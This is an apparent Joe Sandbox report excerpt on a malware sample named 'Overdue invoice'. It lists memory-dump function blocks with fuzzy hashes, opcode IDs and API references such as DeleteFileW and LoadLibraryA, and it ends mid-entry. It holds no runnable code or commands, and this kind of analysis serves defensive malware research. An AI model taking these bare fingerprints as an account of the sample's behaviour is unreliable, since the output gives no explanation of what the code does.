                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: e8c0a1e3a09034775605694901fcee5d99148e52fd3fc8ba1f59301de34f9e47
                                                                          • Instruction ID: 158932f9d7cca61283500e4f0d9549d57e8e4ebee3d1c5309f67e5102cdc4a35
                                                                          • Opcode Fuzzy Hash: e8c0a1e3a09034775605694901fcee5d99148e52fd3fc8ba1f59301de34f9e47
                                                                          • Instruction Fuzzy Hash: B191EA39902358CFCBA5DF20D8886A9B7B2FF4571AF6041DAE90AA7340DB355D81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: d3de3a8f905579bd4cb35078c14b8eadb7e1c6ecb74dd939243538ba134e0b99
                                                                          • Instruction ID: c2846835973d2de58be98b0754afb780430898ba0ca5c2eb7da6d0cfedad650f
                                                                          • Opcode Fuzzy Hash: d3de3a8f905579bd4cb35078c14b8eadb7e1c6ecb74dd939243538ba134e0b99
                                                                          • Instruction Fuzzy Hash: 3181EA39906358CFCBA5DF20D8886A9B7B2FF4570AF6041EAE90AA7340DB355D81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: fa196bf65d9adc71cb32f1618fe07180963ba2622cc9686f0d1acdbef3b2eb91
                                                                          • Instruction ID: 1b4f7f76c362bb489fb03c36f686d37ee3fd3384ae7fbb4035c814cbe2c76d0d
                                                                          • Opcode Fuzzy Hash: fa196bf65d9adc71cb32f1618fe07180963ba2622cc9686f0d1acdbef3b2eb91
                                                                          • Instruction Fuzzy Hash: 8A810B39902258CFCB65DF30D8886A9B7B2FF4570AF6041EAE90AA7340DB355D81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

Function blocks by referenced API (Joe Sandbox IDA Plugin, process 7; uniqueness score not computed for any of these blocks)

• KiUserExceptionDispatcher.NTDLL ref: 064E8156 (API ID: DispatcherExceptionUser)
  Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
  Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
• DeleteFileW.KERNELBASE(00000000), ref: 064E64A0 (API ID: DeleteFile)
  Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
  Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
• LoadLibraryA.KERNELBASE(?), ref: 016DC9DA (API ID: LibraryLoad)
  Source File: 00000007.00000002.521039244.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
  Snapshot File: hcaresult_7_2_16d0000_Overdue invoice.jbxd
• RtlEncodePointer.NTDLL(00000000), ref: 016D4D62 (API ID: EncodePointer)
  Source File: 00000007.00000002.521039244.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
  Snapshot File: hcaresult_7_2_16d0000_Overdue invoice.jbxd

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: a74028127b7a839396647fffc92754427b3aa53f5856dc3b7698d455f7f32ed7
                                                                          • Instruction ID: 4d72e11a946c94cddf527f537ec58e346f6a383c4b48c2f8cb86b7f304c0a844
                                                                          • Opcode Fuzzy Hash: a74028127b7a839396647fffc92754427b3aa53f5856dc3b7698d455f7f32ed7
                                                                          • Instruction Fuzzy Hash: DA210A35A02268CFCB65DF60D8886A9B7B2FF4630AF6041EAE50AA7340DF315D81CF41
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RtlEncodePointer.NTDLL(00000000), ref: 016D4D62
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.521039244.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_16d0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: EncodePointer
                                                                          • String ID:
                                                                          • API String ID: 2118026453-0
                                                                          • Opcode ID: cd231ad74cf4b3dfb496afc7c2009d7223abd8ae125fc56050b7a483b161e59c
                                                                          • Instruction ID: 2fbf2dbf7ed68bfef1cf31a5f7fa685559cb3b1194d62b51f0b59bbd56929e77
                                                                          • Opcode Fuzzy Hash: cd231ad74cf4b3dfb496afc7c2009d7223abd8ae125fc56050b7a483b161e59c
                                                                          • Instruction Fuzzy Hash: 5211AC71D003498FDB50EFA9C84879EBBF4EB45724F10842AD405A3B41CB38A849CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: c0bb1d703c25ab6979435c57a77dca7b8b729e88f168d53f81f9dafc25003ff3
                                                                          • Instruction ID: 0d7e334518191cfeb80111381547a4cf661f4ff417cb80f8f67b05bc9c4b5c09
                                                                          • Opcode Fuzzy Hash: c0bb1d703c25ab6979435c57a77dca7b8b729e88f168d53f81f9dafc25003ff3
                                                                          • Instruction Fuzzy Hash: F521DB35A02268CFCB65DF60D8886ADB7B6FF46306F5041EAE54AA7340DB315D81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: d57fe4f17d7b58d04e40880c1806546dc303c228046d4abc2c29080d3229d627
                                                                          • Instruction ID: 5b8b828c55309c171905ba6c5f04d1973db56dad1ed3955a1599880bf7b5bde6
                                                                          • Opcode Fuzzy Hash: d57fe4f17d7b58d04e40880c1806546dc303c228046d4abc2c29080d3229d627
                                                                          • Instruction Fuzzy Hash: DA113C35A01268CFCB65EF60E8886ADB7B6FF4A306F5001EAE54A97250DF315D81CF41
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: fdfad05f62bcfdaf354f5a011c4f5ee2d518e34340d78ea52eb81df2c0d58c29
                                                                          • Instruction ID: cbe21705306fb569f1c70d4bfbc2b450fb18a3fa736914b5ed6b3c3033c90dba
                                                                          • Opcode Fuzzy Hash: fdfad05f62bcfdaf354f5a011c4f5ee2d518e34340d78ea52eb81df2c0d58c29
                                                                          • Instruction Fuzzy Hash: F601E935E01268CFCB64DF60E8886ADB7B5FF46306F1041EAE50AA7240DB305E81CF91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 76657c47624b2c5889382c4a189b4b570f4852006f506c7264fc9f9ebc67a541
                                                                          • Instruction ID: 995bd46eb579f5980c3f0f891eb51b3f0d6d84bda5fc1aa3d3b4f72c71618cd9
                                                                          • Opcode Fuzzy Hash: 76657c47624b2c5889382c4a189b4b570f4852006f506c7264fc9f9ebc67a541
                                                                          • Instruction Fuzzy Hash: 24F0B635E01268CFCB649F64E888699B7B5FF45315F1041EAE50AA3250DB305E81CF91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: f33e26e824bb0c57d907135985b9c90ab16e317010d36bfddbe076db9fa142c6
                                                                          • Instruction ID: 0548b4305e62058f68f70d0cfc19ead63daf4608daa8fc7994a310416069b236
                                                                          • Opcode Fuzzy Hash: f33e26e824bb0c57d907135985b9c90ab16e317010d36bfddbe076db9fa142c6
                                                                          • Instruction Fuzzy Hash: F6F09235A01228CFCB64AF64E8896D9B7B5FB45706F1141EAE60AA3244DB306E818F91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: P@Jm
                                                                          • API String ID: 0-2739332884
                                                                          • Opcode ID: 7bd8a0832516c625bbfffa6098d6093b0b19ff8db1c48e506ea79840f4c9651a
                                                                          • Instruction ID: b2d477811038058441421b6079bf89ce299325839de37364004cec962aec2745
                                                                          • Opcode Fuzzy Hash: 7bd8a0832516c625bbfffa6098d6093b0b19ff8db1c48e506ea79840f4c9651a
                                                                          • Instruction Fuzzy Hash: 0031E631B00204AFCB54AB76C854AAEBBF6EF8D240B65892DE406DB344DF359D01CBE5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: P@Jm
                                                                          • API String ID: 0-2739332884
                                                                          • Opcode ID: 253e233597f3bbda409353a6ed6d72b09ea22f4f837c8b0f96d8cb3af9da6547
                                                                          • Instruction ID: 2bf44470db2c5da99797b2e7411c88ed709395a2fbf082822b16ae6cd414c89b
                                                                          • Opcode Fuzzy Hash: 253e233597f3bbda409353a6ed6d72b09ea22f4f837c8b0f96d8cb3af9da6547
                                                                          • Instruction Fuzzy Hash: 0D31C231B042049FCB54AB75C8546AEB7E7AF8D240B65892DE406EB384DF309D01CBE5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: \
                                                                          • API String ID: 0-2967466578
                                                                          • Opcode ID: 4bde62572d8dbf345a7eabe8b1c82eb0eefa3e7343fb1e25a0ef635af6e122e0
                                                                          • Instruction ID: 54c3089d28690fa679a8c4d8755ac4a3befe20dfe8748f66ca0ab707b1a05472
                                                                          • Opcode Fuzzy Hash: 4bde62572d8dbf345a7eabe8b1c82eb0eefa3e7343fb1e25a0ef635af6e122e0
                                                                          • Instruction Fuzzy Hash: CC21C171B001059FDF98DBAA8D80BBFB6AAAFC4604F10852DE519E7280EF74D94187E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: \
                                                                          • API String ID: 0-2967466578
                                                                          • Opcode ID: d93e545a3295031a53b53ac8279e3beca6fc5bc99357b64f095e5f55ac7204a8
                                                                          • Instruction ID: e6b027e03fb34087ee7fef8def06f73123335b95391e4b5ff5f089d806a986d9
                                                                          • Opcode Fuzzy Hash: d93e545a3295031a53b53ac8279e3beca6fc5bc99357b64f095e5f55ac7204a8
                                                                          • Instruction Fuzzy Hash: 85213132A042449FDB46DBAA8C906BF77B1AF82204F11816EE515EB1C1EB749D4483E9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: \
                                                                          • API String ID: 0-2967466578
                                                                          • Opcode ID: e28637b897acaa968219f8a4af7c1e4f78ffe8e7fc0a28984877d5054f2ea519
                                                                          • Instruction ID: 5c80a0f4e16160fb6fd9e3bdea4f539b7f90f2ab02ec7531529c804602bfe6ee
                                                                          • Opcode Fuzzy Hash: e28637b897acaa968219f8a4af7c1e4f78ffe8e7fc0a28984877d5054f2ea519
                                                                          • Instruction Fuzzy Hash: 6E21C571E00105AEDB54DBEA8D81BBFB6F9EBC4604F10812EE519E7280EFB4D94187E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: \
                                                                          • API String ID: 0-2967466578
                                                                          • Opcode ID: 925d409d0070807effe88d81ddc91e5d6f85dd5c380e69ece7027fe504f36343
                                                                          • Instruction ID: 53bdeb9db969ba4b100bd4d3c0726415464eaefc80f41d6c7f6e7b5be7ca4a10
                                                                          • Opcode Fuzzy Hash: 925d409d0070807effe88d81ddc91e5d6f85dd5c380e69ece7027fe504f36343
                                                                          • Instruction Fuzzy Hash: 88217171F002108BDB649FBAD88476E76A6AB88314F24853DE519EB384DB75DC42CBE4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e2310dae78eb368a31ab5f71823ed73a62630958a6707435bacd1aa6be80a12a
                                                                          • Instruction ID: 0ec2a7943fa9535c2c425dfff9fc9bc163b50bd31ecd8f99a71db49feb61b24d
                                                                          • Opcode Fuzzy Hash: e2310dae78eb368a31ab5f71823ed73a62630958a6707435bacd1aa6be80a12a
                                                                          • Instruction Fuzzy Hash: 8E22B134E002089FCB50EFB5D9986AEBBB6EF89304F608969E405DB364DB34DD41CB94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c6c7ac06a6264cda5111ead7b0046e58bd18f36ea2d0ed2dfbdbf15f0d28e2b5
                                                                          • Instruction ID: 4acecea6f0ad2cda8a037d99aecc2ae9f9ef0acf075847e7c44b508fbd279792
                                                                          • Opcode Fuzzy Hash: c6c7ac06a6264cda5111ead7b0046e58bd18f36ea2d0ed2dfbdbf15f0d28e2b5
                                                                          • Instruction Fuzzy Hash: EDC1F531F042058FCB55DB6AC894ABEB7F6EF85308F14886EE016DB251DA38DE41C7A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7e298d35c13bc5419fc57dc38912745006df047b22d5089b26571073ef004c2d
                                                                          • Instruction ID: a16e1364c0b8cf01b03a0abef6c55b1ae5feb761f63a25157f42a7f4650e4c61
                                                                          • Opcode Fuzzy Hash: 7e298d35c13bc5419fc57dc38912745006df047b22d5089b26571073ef004c2d
                                                                          • Instruction Fuzzy Hash: 69B11935B042058FCF94DB6AC8C43ADB7B2EF85324F18856AE516DB381C635E941CBA8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 43c1a58263e511d7e4de1e3684e0fe28d8fb037686c9a20bdee1420b857fea5e
                                                                          • Instruction ID: 27e5aaef4a9c79dbe49c778e1ddc5a32937be120d7442572206a296786c46c7f
                                                                          • Opcode Fuzzy Hash: 43c1a58263e511d7e4de1e3684e0fe28d8fb037686c9a20bdee1420b857fea5e
                                                                          • Instruction Fuzzy Hash: 02A16D34B042049FDB40ABB1D998B6DB7B6AB84725F258628F5129B3D9DF71EC01CB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4b19ae3660a0c85a119266f0623ad8ccbf6c0037abc237a353f46cf6aa3639d2
                                                                          • Instruction ID: 198fef5080ab8fb75aaac94182791d1603e50bcce16c9696ec947c309bf92356
                                                                          • Opcode Fuzzy Hash: 4b19ae3660a0c85a119266f0623ad8ccbf6c0037abc237a353f46cf6aa3639d2
                                                                          • Instruction Fuzzy Hash: 5A51A131B042158FCB44EBB9D4946ADB7F6EF89318B218938E506EB394DF31AC41CB95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 869785283b2651b6f4fd89068079ec68de58b3969ad5c1157255713661b1f0b0
                                                                          • Instruction ID: 8e0c263eb37d98b9aef44c000f9ecc63036e80a755d89ff987bd64514060d5c1
                                                                          • Opcode Fuzzy Hash: 869785283b2651b6f4fd89068079ec68de58b3969ad5c1157255713661b1f0b0
                                                                          • Instruction Fuzzy Hash: A8617D74E11218CFCB54EFB1D898A9DBBB6BF49301F508469E90AA7344DB34A941CF50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d6794ff7aa1a6ab09245615e1d3e55d8416d2d40aaf1fa7bb0b7e885bba913f8
                                                                          • Instruction ID: 7ccbe797bd9ec6bfe8c36da0b99127fabf2e3734a823050100fab8b3d9ce7259
                                                                          • Opcode Fuzzy Hash: d6794ff7aa1a6ab09245615e1d3e55d8416d2d40aaf1fa7bb0b7e885bba913f8
                                                                          • Instruction Fuzzy Hash: 8341D430B002158FDB65EB75D89026EB7A7EBC4344F158829E906DB384CF38AD018BE5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0654031155254780edc9336c355c73dc88fd2f70df99f0ef577efd7c53b334fc
                                                                          • Instruction ID: d6bd10c081e93fbb0cfa6f0c00ab695c2b710201388eda6f1b0457071ad388e4
                                                                          • Opcode Fuzzy Hash: 0654031155254780edc9336c355c73dc88fd2f70df99f0ef577efd7c53b334fc
                                                                          • Instruction Fuzzy Hash: BD41D330E043448ADB628F6AC48435DBBA3EFC7304F28C5AEE4099F28AD776C545C769
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 31c32eeeed2f511f431254eb2718760b0f148d4d3df40371b97480abc1e76e22
                                                                          • Instruction ID: b433e3e874920115232c0e925b10e617644690a1c8487585737bbd2c695d3a1d
                                                                          • Opcode Fuzzy Hash: 31c32eeeed2f511f431254eb2718760b0f148d4d3df40371b97480abc1e76e22
                                                                          • Instruction Fuzzy Hash: 7F411B34F053404FDB82D7BA9C5466E7BF2AFC6600B4584A6E508DB392DA38DC06C7A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 55357e1124c1b4d279fdb4267d8e218c0979ca47e646a9ec2f34962985505bb7
                                                                          • Instruction ID: 26cdc78db9002b01ce1cd441b629d33f0d14cbf068b30b72106a7c03a855bbce
                                                                          • Opcode Fuzzy Hash: 55357e1124c1b4d279fdb4267d8e218c0979ca47e646a9ec2f34962985505bb7
                                                                          • Instruction Fuzzy Hash: 8931E734F002044BDB64DF66989476EBAE6EF89360F54842DE50ADB381DA34ED01C7A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7d0f958ccb88ea1203bf308a6ae3297a0acc940e6ad6a0440c843a9e60168e49
                                                                          • Instruction ID: 16a255b8c1e9e059d0a67fe8fc60ea119223dbd8fa31b18a58da79433b0a8263
                                                                          • Opcode Fuzzy Hash: 7d0f958ccb88ea1203bf308a6ae3297a0acc940e6ad6a0440c843a9e60168e49
                                                                          • Instruction Fuzzy Hash: 0E31B635F002158FDF90BFB999846AEB6F5AF88750F148429E905E7344EF349D018BE9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0ea1874eaf86fcd8e188f73b5ae7cdefb188e2bca31f7da6d63b1fe5c594930b
                                                                          • Instruction ID: 6b0c16860a55ab00194a5c5041201477534bdd82761e6231c2533538de9843cf
                                                                          • Opcode Fuzzy Hash: 0ea1874eaf86fcd8e188f73b5ae7cdefb188e2bca31f7da6d63b1fe5c594930b
                                                                          • Instruction Fuzzy Hash: FE31E834F002048BDB64DF6698D476EFAE2EF89360F54842DE50ADB384DA34ED01C7A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cb14710844ef047a1437f78ad5e9772c6d6a9d892f44045f04f6d0cee6ad444d
                                                                          • Instruction ID: cf4295baa5f33f89e86a102ad0ffa6f08f9cecba9d244e2c148fb7691584d27e
                                                                          • Opcode Fuzzy Hash: cb14710844ef047a1437f78ad5e9772c6d6a9d892f44045f04f6d0cee6ad444d
                                                                          • Instruction Fuzzy Hash: 8C318F34E012099FDB44DFA5D980ADEBBF6EB89310F24C469E504EB341D7319941CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
